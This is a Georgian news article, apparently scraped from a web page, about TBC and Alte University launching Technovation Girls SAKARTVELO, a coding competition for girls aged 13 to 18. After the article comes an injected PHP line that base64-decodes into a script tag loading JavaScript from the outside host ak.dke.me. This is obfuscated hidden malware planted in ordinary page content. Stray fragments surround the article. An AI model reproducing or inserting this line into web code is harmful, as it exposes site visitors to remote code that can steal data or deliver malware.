celsiusi
ავერსი შნაიდერი

 თიბისის განათლების პროგრამის მხარდაჭერით და ალტე უნივერსიტეტის ორგანიზებით, გლობალური პროექტი Technovation Girls SAKARTVELO დაიწყო.

წელს კონკურსზე, საქართველოს ყველა რეგიონიდან, 13-დან 18 წლამდე 900-ზე მეტი გოგონადა 250 მენტორი დარეგისტრირდა. Technovation Girls საერთაშორისო კონკურსია, რომელიც 17 წელია, მსოფლიოს ასზე მეტი ქვეყნის ათიათასობით გოგონას ტექნოლოგიების და ინოვაციური იდეების ირგვლივ აერთიანებს.

კონკურსში საქართველო წელს უკვე მეორედ მონაწილეობს. ოთხი თვის განმავლობაში გოგონები ისწავლიან პროგრამირებასა და ახალი ტექნოლოგიური პროდუქტის განვითარებას, მათ გარშემო არსებული პრობლემის გადასაჭრელად შეიმუშავებენ ინოვაციურ იდეებს და შექმნიან აპლიკაციას ან
ხელოვნური ინტელექტის პროტოტიპს.

ივნისში საქართველოს გამარჯვებულები გუნდები საერთაშორისო ჟიურის მიერ შეფასდებიან. რის შემდეგაც დასახელდებიან ფინალისტები და რეგიონული გამარჯვებულები. 2024 წლის სეზონის გამარჯვებული გუნდები ფინალის მსოფლიო სამიტზე, ოქტომბერში, გამოვლინდებიან. კონკურსის მეოთხედფინალში გამოვლენილი საუკეთესო 20 გუნდი მონაწილეობას მიიღებს ტექნოლოგიურ საზაფხულო ბანაკში, საქართველოში.

გასულ წელს, ქართველმა გოგონებმა, ფარიდან და ცაგერიდან, პროექტით Smart Light, 2023 წელს ევროპის მასშტაბით გამარჯვება მოიპოვეს. საქართველომ კი დასრულებული პროექტების რაოდენობით, მსოფლიო მასშტაბით მე-10 ადგილი დაიკავა. თიბისი, როგორც ტექნოლოგიური კომპანია, Technovation Girls SAKARTVELO-ს მხარდაჭერით, მიზნად ისახავს ტექეკოსისტემის განვითარების ხელშეწყობას, ამ სფეროში გოგონების გაძლიერებას და ზოგადად ახალგაზრდა თაობაში ტექნოლოგიურ საკითხებთან დაკავშირებით ცნობადობის ამაღლებას.

231
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");